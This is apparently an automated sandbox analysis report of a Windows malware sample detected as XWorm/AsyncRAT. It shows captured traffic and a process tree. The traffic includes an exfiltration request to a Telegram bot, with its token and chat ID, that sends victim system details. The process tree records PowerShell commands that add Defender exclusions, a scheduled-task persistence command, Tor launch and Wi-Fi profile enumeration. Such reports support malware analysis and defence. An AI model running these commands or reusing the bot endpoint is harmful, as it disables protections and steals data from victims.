                                                                          Date: Tue, 23 Jul 2024 13:47:03 GMT
                                                                          X-Served-By: cache-iad-kcgs7200078-IAD, cache-nyc-kteb1890061-NYC
                                                                          X-Cache: HIT, MISS
                                                                          X-Cache-Hits: 115, 0
                                                                          X-Timer: S1721742424.628878,VS0,VE50
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 01 11 2d 7a 6e 2c 01 fe 21 49 25 9f ed a6 e4 27 f7 61 c9 bd 5c cf 3b 96 15 69 7f 17 32 b9 38 7a 5f 98 4b 9a d7 d5 8c cc 58 c6 0d 3c 63 46 52 dd e7 75 83 9b 39 54 f7 43 bc 48 4e 52 91 5f ba 01 67 18 15 b9 11 b6 48 6b e6 a1 78 ec 29 07 98 36 11 d1 cb a1 01 74 6a a2 00 f5 6b 1f 45 3b 49 61 ee b9 87 65 8a ca c0 e6 89 42 0b 6b 00 e8 cd 6c 96 31 9a 9e 10 61 bc 9f 14 55 78 e6 50 61 52 e9 32 96 3e bf 46 99 00 2b 98 bc f0 49 98 93 c5 d2 fc 7c 98 50 72 68 04 bc 3a 81 42 60 30 47 94 3a 2c 61 47 6d ec cd 6d 29 60 5d 03 39 a9 06 e4 b9 7a 2f 51 d9 36 06 0b 7c b3 ab 55 4d a5 e1 2f 19 94 e7 5f 0e 3a 92 80 3c 0e 48 b3 d5 d3 c6 f3 44 a0 9e 10 ce 1e c8 e6 4a ca 16 3d 83 b2 4d 8e 37 47 36 2e 2c ed fd d3 28 6d 78 37 a0 38 79 9e a9 bc 99 73 6c 79 9c f6 93 1d d0 8f f1 3c 0e 5b
                                                                          Data Ascii: -zn,!I%'a\;i28z_KX<cFRu9TCHNR_gHkx)6tjkE;IaeBkl1aUxPaR2>F+I|Prh:B`0G:,aGmm)`]9z/Q6|UM/_:<HDJ=M7G6.,(mx78ysly<[
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: b8 4f 81 d6 91 a8 4f 83 fa ae 4d aa ef e6 6e ea 0b b0 fa da 5f a5 fc e3 92 f2 4f eb 26 7f 09 cb 1f bd 2f de 31 d0 5b 91 c1 c8 f0 69 dc 68 ad 43 3b 25 49 bd c7 f7 57 65 ec f1 6d f1 77 34 f2 d5 1d ac 91 73 13 fc 03 80 ff 44 1a 3c 24 95 bb a2 ef c7 35 5c 71 fe 14 69 d8 9d c2 d3 5f e9 92 ce 18 28 a3 db 2c 7d 01 e4 01 3b 0e d2 97 e9 0b da 50 79 14 d8 a7 d7 42 ed 2d 96 de ab a5 2b ff ab 35 52 4c ae b7 7a d7 4d 09 f6 30 ab 27 26 bd ef ba 31 29 3d e9 7d d7 0d 49 e9 49 ef bb 26 24 a5 27 bd ef 1a 9f 94 9e f4 be eb fa a4 f4 a4 f7 5d 7f 4c 4a 4f 7a df 35 2e 29 3d e9 7d d7 d8 a4 f4 a4 f7 5d 63 92 d2 93 de 77 5d 97 94 9e f4 be ab 2a 29 3d e9 7d d7 e8 df c0 f7 84 df e8 ef 8d bf 81 cf 3f fe c6 78 8d 4f 4a ff 2d fc 8c f9 df fd e9 82 df 31 dd e0 27 61 bd d5 36 8d 06 29 65
                                                                          Data Ascii: OOMn_O&/1[ihC;%IWemw4sD<$5\qi_(,};PyB-+5RLzM0'&1)=}II&$']LJOz5.)=}]cw]*)=}?xOJ-1'a6)e
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 23 f3 f1 2e 3e 30 62 1b 0c d2 09 46 e7 94 db f8 e8 04 2a 92 07 44 5e f8 19 8c 04 0d ca d1 ff 31 28 dd d8 97 fd 5e bc 4e ba 15 bd b5 ba f0 67 db 37 da af 14 7b 00 c7 bc 6b bf 41 71 57 4e b2 28 0e 4e 91 81 bd 66 a2 bf ab 0d 52 58 e0 24 25 99 4c 8c 9a 49 16 8d d8 40 98 25 d8 c6 7b e8 ef 1b ef cf 26 a1 41 f1 63 09 63 bd b6 d3 1c eb 15 36 f5 0f 23 44 b4 3f 29 61 4c 67 82 92 cb 4a 55 5a 23 fc 7f d4 f1 52 86 4d 9c 21 34 a2 a7 99 56 28 b3 84 64 8b 94 df 3b 3e 1b 6e 46 ba 5f 89 fb 91 42 a8 b4 2f a8 65 b4 4a e2 d8 96 3e 20 79 ff 02 c6 cf 60 1a 32 d2 cb b8 ed b5 60 ef ea 1e 34 d4 1d 4c 3d 38 d4 e3 0c 16 e9 7f 74 31 31 6e 10 63 ca 8c 81 96 e8 f7 48 e2 57 91 aa cb 63 8c e1 7f a5 1d c5 79 59 ef 50 7f 40 79 ee 63 92 e7 f4 34 c6 fd d6 92 c6 91 b1 f6 86 f1 be c6 f8 62 01
                                                                          Data Ascii: #.>0bF*D^1(^Ng7{kAqWN(NfRX$%LI@%{&Acc6#D?)aLgJUZ#RM!4V(d;>nF_B/eJ> y`2`4L=8t11ncHWcyYP@yc4b
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: 0b ee 6a 2d e5 72 03 58 64 a3 7f 5d 01 64 f7 72 12 9b 41 84 0e 47 5b c6 9a 71 29 02 df 7f 17 ea c3 25 fd e4 d6 42 3a 65 f5 e8 60 20 57 2e 69 95 2e 46 82 f1 75 e9 54 f3 08 20 89 6e 67 c4 e9 16 0f 0c 77 8c 21 e7 8e f6 a6 c9 36 ff 3e d7 59 66 76 0e f2 1f c7 a5 74 8d df c4 e1 cd 4a 84 d7 85 fb df b1 08 6f 6f 84 c9 3e 9f 06 9d 00 ae bb 92 e0 2a e4 70 d9 2a b0 c3 77 51 12 7c 6b c6 76 03 df 75 63 7d 31 5a 71 ab 51 c3 91 a7 df 00 78 ef d9 7e 23 8f 6b d2 62 99 14 71 27 d8 f3 56 02 d8 f3 ce 61 fb c2 62 b7 f6 15 f8 01 b4 96 12 a2 f7 69 77 bb 61 d9 b4 4d 71 ed 46 26 46 05 4e d2 c0 4a 3e 43 db 67 c9 4f 5a 50 b0 7d 48 d0 c3 26 f0 3b a4 3f 1b 7d 22 7d 81 1a 30 45 2f 77 6b 3d 5b ac f8 58 a4 9f 4d 67 b0 7b da fd 71 fe c2 72 9e a9 7d a5 8f 77 27 74 a3 40 31 6e 7d 03 09 8c
                                                                          Data Ascii: j-rXd]drAG[q)%B:e` W.i.FuT ngw!6>YfvtJoo>*p*wQ|kvuc}1ZqQx~#kbq'VabiwaMqF&FNJ>CgOZP}H&;?}"}0E/wk=[XMg{qr}w't@1n}
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: cc 38 c6 e4 06 2b 1e dd a9 b6 78 74 b5 24 65 41 5e e3 85 91 24 31 2f 06 10 ea 0c 58 b5 5a 8c c9 60 f6 59 9c 69 dc 88 bf 59 c6 98 83 a0 6e ca d4 8a 73 99 80 9b a1 8f 86 a3 a1 be 74 20 d1 18 70 83 42 a3 8d 2b 34 60 c7 f6 38 e4 2e c6 10 3f 11 7c cc 85 c7 05 07 11 45 00 cb b9 bc db 00 87 51 34 12 34 a5 ad d8 b4 a9 1e 69 4b 88 73 97 ce e5 bd da 24 79 ef 3e db fe a9 aa 82 e2 dc 6d a5 b2 16 7d c6 cf 03 0a f5 15 d0 44 7b a9 c9 97 5d 57 d9 c0 80 b3 c5 42 74 81 fc f7 d5 a4 a8 1b 9e 98 0a 49 8f 5d 4d be 4d a7 fe ca 7a 55 8a 46 87 0f 40 af 20 b8 c1 ab ed c3 b8 de cb 55 d9 6d bd d7 f3 7a af e9 5a ef 95 bc de b7 7f 81 7a 11 71 79 dd d4 3b b6 db 7a 1d bc de 71 5d eb fd be 82 ea bd 1d eb c5 51 f8 fc 57 b3 de c8 5c 49 db cf be ea 77 64 a9 df 1f d3 c7 64 66 1f c6 58 02 3b
                                                                          Data Ascii: 8+xt$eA^$1/XZ`YiYnst pB+4`8.?|EQ44iKs$y>m}D{]WBtI]MMzUF@ UmzZzqy;zq]QW\IwddfX;
                                                                          2024-07-23 13:47:03 UTC1378INData Raw: fc cb f4 98 cb 1e 57 d3 a3 7d 47 af ab 40 ac 68 bf 91 82 15 c0 fe 49 5d 8f 3f a7 ca 8f 34 ab 46 3f 46 68 b3 64 9e 02 b4 ba 15 a6 fb cb ca eb f0 ba 37 80 7b d1 b7 53 89 bc 7c 43 9d 58 d7 7e 09 b7 49 0a af a8 9f b9 45 97 97 34 87 63 34 3f e4 47 1a 07 36 d7 57 29 83 1a 5a 8b bd 7c bf 69 3c ef 43 1c f6 d1 5f 03 94 01 f6 2f 74 50 ca f6 37 01 17 f3 3e 86 e7 e5 85 d8 4a f8 35 68 45 c7 9c 10 df 18 94 d6 eb c6 b1 aa f7 43 4b a1 57 60 09 a6 c9 d2 d1 37 d0 b3 55 cd 93 39 ee 47 d7 e8 ff f8 9c a0 4f 53 3b fa c9 e1 23 b0 a5 1d 9d a5 7d aa 7e e7 90 c3 bf b0 6a fd d4 5d 39 94 96 02 e5 bd 72 e8 6f 18 93 b3 af 1c ee 0d 5a 8f c5 d0 6a a4 a8 73 08 1b c0 79 f2 c2 28 0e 29 90 ad 53 05 9a 95 57 4e 11 e5 55 2e c6 03 f2 c1 0c 26 bc 45 30 3d b2 e5 95 20 d8 fb c1 21 3d be ed 35 fd
                                                                          Data Ascii: W}G@hI]?4F?Fhd7{S|CX~IE4c4?G6W)Z|i<C_/tP7>J5hECKW`7U9GOS;#}~j]9roZjsy()SWNU.&E0= !=5


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          3 | 192.168.2.5 | 49727 | 149.154.167.220 | 443 | 5624 | C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-07-23 13:47:16 UTC | 1550 | OUT | GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72% [TRUNCATED]
                                                                          Host: api.telegram.org
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:47:16 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Tue, 23 Jul 2024 13:47:16 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 1150
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-07-23 13:47:16 UTC | 1150 | IN | Data Ascii: {"ok":true,"result":{"message_id":247,"from":{"id":7418591347,"is_bot":true,"first_name":"WhiteSnake Logs","username":"WS_06f285e1f450eb_bot"},"chat":{"id":6878338460,"first_name":"leaks","last_name":"open","username":"vatsrco","type":"private"},"date":17


                                                                          Target ID:0
                                                                          Start time:09:46:32
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\yt7dW9nyJK.exe"
                                                                          Imagebase:0x120000
                                                                          File size:465'416 bytes
                                                                          MD5 hash:ADBE420A49DB30F75D4665EA0014AF43
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:09:46:33
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:09:46:33
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:09:46:33
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\yt7dW9nyJK.exe"
                                                                          Imagebase:0x8e0000
                                                                          File size:465'416 bytes
                                                                          MD5 hash:ADBE420A49DB30F75D4665EA0014AF43
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:6
                                                                          Start time:09:46:37
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:09:46:37
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:09:46:41
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:09:46:41
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:09:46:52
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                                                                          Imagebase:0x3b0000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 46%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x790000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:09:46:53
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                          Wow64 process (32bit):true
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x1f0000
                                                                          File size:12'800 bytes
                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:09:46:54
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 3
                                                                          Imagebase:0xaa0000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:09:46:57
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
                                                                          Imagebase:0x260000
                                                                          File size:187'904 bytes
                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:09:46:57
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0xae0000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 46%, ReversingLabs
                                                                          Has exited:false

                                                                          Target ID:20
                                                                          Start time:09:46:58
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:09:46:58
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:09:46:58
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Imagebase:0x680000
                                                                          File size:511'496 bytes
                                                                          MD5 hash:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:09:47:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                                                                          Imagebase:0x50000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:09:47:00
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:25
                                                                          Start time:09:47:08
                                                                          Start date:23/07/2024
                                                                          Path:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
                                                                          Imagebase:0xa0000
                                                                          File size:4'229'632 bytes
                                                                          MD5 hash:07244A2C002FFDF1986B454429EACE0B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:false

                                                                          Target ID:26
                                                                          Start time:09:47:08
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:27
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                          Imagebase:0x790000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:29
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                          Wow64 process (32bit):true
                                                                          Commandline:chcp 65001
                                                                          Imagebase:0x1f0000
                                                                          File size:12'800 bytes
                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:30
                                                                          Start time:09:47:10
                                                                          Start date:23/07/2024
                                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:netsh wlan show profiles
                                                                          Imagebase:0x1080000
                                                                          File size:82'432 bytes
                                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
